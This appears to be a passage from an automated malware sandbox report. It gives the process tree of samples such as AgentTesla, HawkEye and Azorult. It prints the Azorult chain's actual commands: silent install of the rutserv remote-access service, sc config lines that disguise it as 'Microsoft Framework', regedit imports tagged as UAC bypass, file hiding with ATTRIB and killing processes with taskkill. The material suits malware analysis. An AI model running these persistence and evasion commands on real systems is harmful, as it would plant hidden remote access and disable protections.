C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5180 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:968
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5332 /prefetch:12⤵PID:660
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5600 /prefetch:12⤵PID:2980
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5500 /prefetch:82⤵PID:4876
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5424 /prefetch:12⤵PID:5036
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5340 /prefetch:12⤵PID:4464
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6532 /prefetch:82⤵PID:4156
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5488 /prefetch:12⤵PID:740
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6660 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3104
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:12⤵PID:2256
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6028 /prefetch:82⤵PID:2564
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6016 /prefetch:82⤵PID:496
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5492 /prefetch:12⤵PID:2980
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5764 /prefetch:82⤵PID:2744
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6052 /prefetch:12⤵PID:4276
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6284 /prefetch:82⤵PID:5032
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6676 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2880
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5568 /prefetch:82⤵PID:1740
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5740 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:908
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6172 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5108
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6596 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4684
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5860 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5032
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5948 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2896
-
-
C:\Users\Admin\Downloads\AdwereCleaner.exe"C:\Users\Admin\Downloads\AdwereCleaner.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
PID:5104 -
C:\Users\Admin\AppData\Local\6AdwCleaner.exe"C:\Users\Admin\AppData\Local\6AdwCleaner.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1060
-
-
-
C:\Users\Admin\Downloads\AdwereCleaner.exe"C:\Users\Admin\Downloads\AdwereCleaner.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
PID:4348 -
C:\Users\Admin\AppData\Local\6AdwCleaner.exe"C:\Users\Admin\AppData\Local\6AdwCleaner.exe"3⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:64
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5492 /prefetch:12⤵PID:2372
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5664 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3972
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5676 /prefetch:12⤵PID:4428
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1984 /prefetch:12⤵PID:2116
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5260 /prefetch:82⤵PID:1020
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5876 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2916
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6720 /prefetch:82⤵PID:3428
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6160 /prefetch:82⤵PID:4588
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5644 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:776
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6236 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4504
-
-
C:\Users\Admin\Downloads\AgentTesla.exe"C:\Users\Admin\Downloads\AgentTesla.exe"2⤵
- Chimera
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:4396
-
-
C:\Users\Admin\Downloads\AgentTesla.exe"C:\Users\Admin\Downloads\AgentTesla.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5104
-
-
C:\Users\Admin\Downloads\HawkEye.exe"C:\Users\Admin\Downloads\HawkEye.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3420
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5512 /prefetch:12⤵PID:4712
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1740 /prefetch:12⤵PID:2272
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3592 /prefetch:12⤵PID:1296
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6796 /prefetch:12⤵PID:1052
-
-
C:\Users\Admin\Downloads\butterflyondesktop.exe"C:\Users\Admin\Downloads\butterflyondesktop.exe"2⤵
- Executes dropped EXE
PID:1756 -
C:\Users\Admin\AppData\Local\Temp\is-F3L8D.tmp\butterflyondesktop.tmp"C:\Users\Admin\AppData\Local\Temp\is-F3L8D.tmp\butterflyondesktop.tmp" /SL5="$30274,2719719,54272,C:\Users\Admin\Downloads\butterflyondesktop.exe"3⤵
- Executes dropped EXE
PID:2564
-
-
-
C:\Users\Admin\Downloads\butterflyondesktop.exe"C:\Users\Admin\Downloads\butterflyondesktop.exe"2⤵
- Executes dropped EXE
PID:4836 -
C:\Users\Admin\AppData\Local\Temp\is-6PLUD.tmp\butterflyondesktop.tmp"C:\Users\Admin\AppData\Local\Temp\is-6PLUD.tmp\butterflyondesktop.tmp" /SL5="$301EE,2719719,54272,C:\Users\Admin\Downloads\butterflyondesktop.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4132 -
C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe"C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe"4⤵
- Executes dropped EXE
- Suspicious use of SendNotifyMessage
PID:2116
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://freedesktopsoft.com/butterflyondesktoplike.html4⤵PID:4452
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd37d446f8,0x7ffd37d44708,0x7ffd37d447185⤵PID:1572
-
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6020 /prefetch:12⤵PID:1932
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6644 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:2660
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6648 /prefetch:12⤵PID:3436
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5300 /prefetch:82⤵PID:4396
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4864 /prefetch:82⤵PID:3372
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3448 /prefetch:12⤵PID:2788
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6184 /prefetch:12⤵PID:4132
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6676 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3164
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5620 /prefetch:12⤵PID:2752
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6804 /prefetch:12⤵PID:204
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=904 /prefetch:82⤵PID:1416
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3592 /prefetch:82⤵PID:3556
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4864 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4916
-
-
C:\Users\Admin\Downloads\Azorult.exe"C:\Users\Admin\Downloads\Azorult.exe"2⤵
- Modifies Windows Defender Real-time Protection settings
- UAC bypass
- Blocks application from running via registry modification
- Drops file in Drivers directory
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Modifies WinLogon
- Hide Artifacts: Hidden Users
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- System policy modification
PID:3004 -
C:\ProgramData\Microsoft\Intel\wini.exeC:\ProgramData\Microsoft\Intel\wini.exe -pnaxui3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3176 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:4132 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "5⤵PID:4720
-
C:\Windows\SysWOW64\regedit.exeregedit /s "reg1.reg"6⤵
- UAC bypass
- Windows security bypass
- Hide Artifacts: Hidden Users
- System Location Discovery: System Language Discovery
- Runs .reg file with regedit
PID:5100
-
-
C:\Windows\SysWOW64\regedit.exeregedit /s "reg2.reg"6⤵
- Runs .reg file with regedit
PID:1144
-
-
C:\Windows\SysWOW64\timeout.exetimeout 26⤵
- Delays execution with timeout.exe
PID:2908
-
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /silentinstall6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4216
-
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /firewall6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:772
-
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /start6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1644
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows\*.*6⤵
- Views/modifies file attributes
PID:4588
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows6⤵
- Views/modifies file attributes
PID:2276
-
-
C:\Windows\SysWOW64\sc.exesc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/10006⤵
- Launches sc.exe
PID:4584
-
-
C:\Windows\SysWOW64\sc.exesc config RManService obj= LocalSystem type= interact type= own6⤵
- Launches sc.exe
PID:3552
-
-
C:\Windows\SysWOW64\sc.exesc config RManService DisplayName= "Microsoft Framework"6⤵
- Launches sc.exe
PID:4292
-
-
-
-
C:\ProgramData\Windows\winit.exe"C:\ProgramData\Windows\winit.exe"4⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
PID:4204 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat5⤵PID:2620
-
C:\Windows\SysWOW64\timeout.exetimeout 56⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2896
-
-
-
-
-
C:\programdata\install\cheat.exeC:\programdata\install\cheat.exe -pnaxui3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2948 -
C:\ProgramData\Microsoft\Intel\taskhost.exe"C:\ProgramData\Microsoft\Intel\taskhost.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4568 -
C:\programdata\microsoft\intel\P.exeC:\programdata\microsoft\intel\P.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4928
-
-
C:\programdata\microsoft\intel\R8.exeC:\programdata\microsoft\intel\R8.exe5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4640 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"6⤵
- Checks computer location settings
PID:1248 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "7⤵
- Checks computer location settings
PID:2224 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4832
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe8⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2260
-
-
C:\Windows\SysWOW64\timeout.exetimeout 38⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:1616
-
-
C:\Windows\SysWOW64\chcp.comchcp 12518⤵PID:1764
-
-
C:\rdp\Rar.exe"Rar.exe" e -p555 db.rar8⤵
- Executes dropped EXE
PID:2744
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe8⤵
